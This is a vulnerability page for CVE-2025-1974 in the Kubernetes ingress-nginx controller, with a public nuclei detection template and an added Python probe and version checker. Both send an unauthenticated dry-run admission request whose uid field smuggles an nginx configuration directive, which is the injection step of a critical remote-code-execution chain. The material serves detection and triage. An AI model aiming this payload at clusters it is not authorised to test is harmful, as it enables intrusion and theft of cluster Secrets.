A security issue was discovered in Kubernetes where under certain conditions, an unauthenticated attacker with access to the pod network can achieve arbitrary code execution in the context of the ingress-nginx controller. This can lead to disclosure of Secrets accessible to the controller. (Note that in the default installation, the controller can access all Secrets cluster-wide.)
PoC code [public]
id: CVE-2025-1974

info:
  name: Ingress-Nginx Controller - Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch,UNC1739
  severity: critical
  description: |
    A security issue was discovered in Kubernetes where under certain conditions, an unauthenticated attacker with access to the pod network can achieve arbitrary code execution in the context of the ingress-nginx controller. This can lead to disclosure of Secrets accessible to the controller. (Note that in the default installation, the controller can access all Secrets cluster-wide.)
  impact: |
    Vulnerable versions of Ingress-Nginx controller can be exploited to gain unauthorized access to all secrets across namespaces in the Kubernetes cluster, potentially leading to complete cluster takeover.
  remediation: |
    Update to one of the following versions: Version 1.12.1 or later / Version 1.11.5 or later
  reference:
    - https://www.wiz.io/blog/ingress-nginx-kubernetes-vulnerabilities
    - https://projectdiscovery.io/blog/ingressnightmare-unauth-rce-in-ingress-nginx
    - https://nvd.nist.gov/vuln/detail/CVE-2025-1974
    - https://github.com/kubernetes/kubernetes/issues/131009
    - https://github.com/eeeeeeeeee-code/POC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-1974
    cwe-id: CWE-653
    epss-score: 0.87763
    epss-percentile: 0.99438
  metadata:
    verified: true
    max-request: 1
    shodan-query: ssl:"ingress-nginx" port:8443
  tags: cve,cve2025,cloud,devops,kubernetes,ingress,nginx,k8s

variables:
  string: "{{to_lower('{{randstr}}')}}"

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "kind": "AdmissionReview",
          "apiVersion": "admission.k8s.io/v1",
          "request": {
            "uid": "{{string}}",
            "kind": {
              "group": "networking.k8s.io",
              "version": "v1",
              "kind": "Ingress"
            },
            "resource": {
              "group": "networking.k8s.io",
              "version": "v1",
              "resource": "ingresses"
            },
            "requestKind": {
              "group": "networking.k8s.io",
              "version": "v1",
              "kind": "Ingress"
            },
            "requestResource": {
              "group": "networking.k8s.io",
              "version": "v1",
              "resource": "ingresses"
            },
            "name": "test-{{randstr}}",
            "namespace": "default",
            "operation": "CREATE",
            "userInfo": {
              "uid": "{{string}}"
            },
            "object": {
              "kind": "Ingress",
              "apiVersion": "networking.k8s.io/v1",
              "metadata": {
                "name": "test-{{randstr}}",
                "namespace": "default",
                "creationTimestamp": null,
                "uid": "InjectTest#;\n\n}\n}\n}\nload_module test;",
                "annotations": {
                  "nginx.ingress.kubernetes.io/mirror-target": "fake-mirror-target"
                }
              },
              "spec": {
                "ingressClassName": "nginx",
                "rules": [
                  {
                    "host": "test.example.com",
                    "http": {
                      "paths": [
                        {
                          "path": "/",
                          "pathType": "Prefix",
                          "backend": {
                            "service": {
                              "name": "kubernetes",
                              "port": {
                                "number": 443
                              }
                            }
                          }
                        }
                      ]
                    }
                  }
                ]
              },
              "status": {
                "loadBalancer": {}
              }
            },
            "oldObject": null,
            "dryRun": true,
            "options": {
              "kind": "CreateOptions",
              "apiVersion": "meta.k8s.io/v1"
            }
          }
        }

    matchers:
      - type: word
        part: body
        words:
          - 'AdmissionReview'
          - 'load_module'
          - 'directive is specified too late'
        condition: and

# digest: 490a00463044022042f299c84c6b2c36b48d9370adb67e44fd343e109e8e346d5af26874f146c8e7022033163ac586b3eea7079d3ca3f8133f121df5a24d5da5cd6aefceec5359929ba6:922c64590222798bb761d5b6d8e72950
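The template above only tells you whether the webhook answered with nginx's "load_module ... specified too late" error. The following Python is an added example (my code, not part of the nuclei template, the projectdiscovery templates repository, or the ingress-nginx project) that reproduces the same dry-run AdmissionReview probe, parses the webhook's reply for the two markers the template matches on, and adds the triage step a defender needs alongside it: deciding from the controller image tag whether a deployment is below the fixed releases named in the remediation line. Assumptions not taken from the page: the fixed-version table treats 1.11.5 and 1.12.1 as the first patched releases of their branches, anything older than the 1.11 branch as unpatched and any later branch as patched; the in-cluster webhook address `ingress-nginx-controller-admission.ingress-nginx.svc` is the default Service name of the standard manifest and must be adjusted for other installs; both sample replies are constructed, not captured from a real cluster.

```python
import json
import re
import ssl
import urllib.request

# First patched release per minor branch, from the page's remediation line.
# Assumption: branches older than 1.11 never received a fix, later ones ship fixed.
FIXED = {(1, 11): 5, (1, 12): 1}
_VER = re.compile(r"v?(\d+)\.(\d+)\.(\d+)")

# Same injection string as the template's metadata.uid: closes the open
# location/server/http blocks, then adds a directive nginx accepts only at the
# very top of the main context, so `nginx -t` rejects it as "specified too late".
UID_PAYLOAD = "InjectTest#;\n\n}\n}\n}\nload_module test;"

# Constructed sample replies (not captured from a cluster) in AdmissionReview
# shape: a denied dry-run whose status message carries nginx's config-test error,
# and an ordinary admission that says nothing about load_module.
SAMPLE_VULNERABLE = json.dumps({
    "kind": "AdmissionReview", "apiVersion": "admission.k8s.io/v1",
    "response": {"uid": "probe", "allowed": False, "status": {"message":
        'admission webhook denied the request: nginx: [emerg] "load_module" '
        'directive is specified too late in /tmp/nginx/nginx-cfg0000:128'}}})
SAMPLE_SAFE = json.dumps({
    "kind": "AdmissionReview", "apiVersion": "admission.k8s.io/v1",
    "response": {"uid": "probe", "allowed": True}})


def parse_version(image_or_tag):
    """(major, minor, patch) from 'v1.11.4' or a full image reference such as
    'registry.k8s.io/ingress-nginx/controller:v1.12.0@sha256:...'."""
    tag = image_or_tag.split("@", 1)[0].rsplit(":", 1)[-1]   # drop digest, keep tag
    m = _VER.search(tag)
    if not m:
        raise ValueError(f"no version in {image_or_tag!r}")
    return tuple(int(x) for x in m.groups())


def is_vulnerable_version(image_or_tag):
    """True when the controller predates the first patched release of its branch."""
    major, minor, patch = parse_version(image_or_tag)
    if (major, minor) in FIXED:
        return patch < FIXED[(major, minor)]
    return (major, minor) < (1, 11)


def build_admission_review(uid_payload=UID_PAYLOAD, name="test-probe", namespace="default"):
    """Replicate the template's request: a dryRun CREATE of an Ingress whose
    metadata.uid carries the payload, combined with the mirror-target annotation
    the template relies on to get that uid rendered into the generated nginx.conf."""
    gvk = {"group": "networking.k8s.io", "version": "v1", "kind": "Ingress"}
    gvr = {"group": "networking.k8s.io", "version": "v1", "resource": "ingresses"}
    backend = {"service": {"name": "kubernetes", "port": {"number": 443}}}
    ingress = {"kind": "Ingress", "apiVersion": "networking.k8s.io/v1",
        "metadata": {"name": name, "namespace": namespace, "uid": uid_payload,
            "annotations": {"nginx.ingress.kubernetes.io/mirror-target": "fake-mirror-target"}},
        "spec": {"ingressClassName": "nginx", "rules": [{"host": "test.example.com",
            "http": {"paths": [{"path": "/", "pathType": "Prefix", "backend": backend}]}}]}}
    return {"kind": "AdmissionReview", "apiVersion": "admission.k8s.io/v1",
        "request": {"uid": "probe", "kind": gvk, "resource": gvr, "requestKind": gvk,
            "requestResource": gvr, "name": name, "namespace": namespace,
            "operation": "CREATE", "userInfo": {"uid": "probe"}, "object": ingress,
            "oldObject": None, "dryRun": True,
            "options": {"kind": "CreateOptions", "apiVersion": "meta.k8s.io/v1"}}}


def response_indicates_injection(body):
    """True when the reply is a denied AdmissionReview whose message carries both
    markers the template's matchers require: nginx parsed the injected load_module
    directive and complained that it came too late."""
    try:
        review = json.loads(body)
    except ValueError:
        return False
    if not isinstance(review, dict) or review.get("kind") != "AdmissionReview":
        return False
    resp = review.get("response") or {}
    if resp.get("allowed", True):
        return False
    msg = (resp.get("status") or {}).get("message", "")
    return "load_module" in msg and "directive is specified too late" in msg


def probe(url="https://ingress-nginx-controller-admission.ingress-nginx.svc/", timeout=10):
    """POST the probe from inside the pod network (assumed default Service name).
    The webhook presents a self-signed certificate, hence the unverified TLS context."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    req = urllib.request.Request(url, data=json.dumps(build_admission_review()).encode(),
                                 headers={"Content-Type": "application/json"}, method="POST")
    with urllib.request.urlopen(req, timeout=timeout, context=ctx) as r:
        return response_indicates_injection(r.read().decode())


if __name__ == "__main__":
    for tag in ("v1.11.4", "v1.11.5", "v1.12.0", "v1.12.1"):
        print(tag, "vulnerable" if is_vulnerable_version(tag) else "patched")
    print("constructed sample reply flagged:", response_indicates_injection(SAMPLE_VULNERABLE))
```

For the triage step, feed `is_vulnerable_version()` the controller image from the cluster, for example `kubectl get pods -A -o jsonpath='{range .items[*]}{.spec.containers[*].image}{"\n"}{end}' | grep ingress-nginx/controller`. Because the request is a `dryRun`, nothing is persisted through the API server; the webhook still renders and config-tests the Ingress, which is exactly why its error text is observable.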